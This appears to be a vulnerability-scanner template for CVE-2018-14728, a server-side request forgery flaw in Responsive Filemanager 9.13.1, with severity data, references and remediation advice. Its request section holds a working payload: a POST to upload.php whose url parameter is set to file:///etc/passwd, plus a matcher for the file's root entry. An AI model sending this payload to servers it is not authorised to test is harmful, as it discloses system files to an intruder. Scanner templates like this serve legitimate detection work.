id: CVE-2018-14728 info: name: Responsive filemanager 9.13.1 Server-Side Request Forgery author: madrobot severity: critical description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter. remediation: | Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability. reference: - http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html - https://www.exploit-db.com/exploits/45103/ - https://nvd.nist.gov/vuln/detail/CVE-2018-14728 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-14728 cwe-id: CWE-918 epss-score: 0.96926 epss-percentile: 0.99601 cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tecrail product: responsive_filemanager tags: cve,cve2018,ssrf,lfi,packetstorm,edb,intrusive http: - method: POST path: - "{{BaseURL}}/filemanager/upload.php" body: fldr=&url=file:///etc/passwd matchers: - type: regex part: body regex: - "root:.*:0:0:"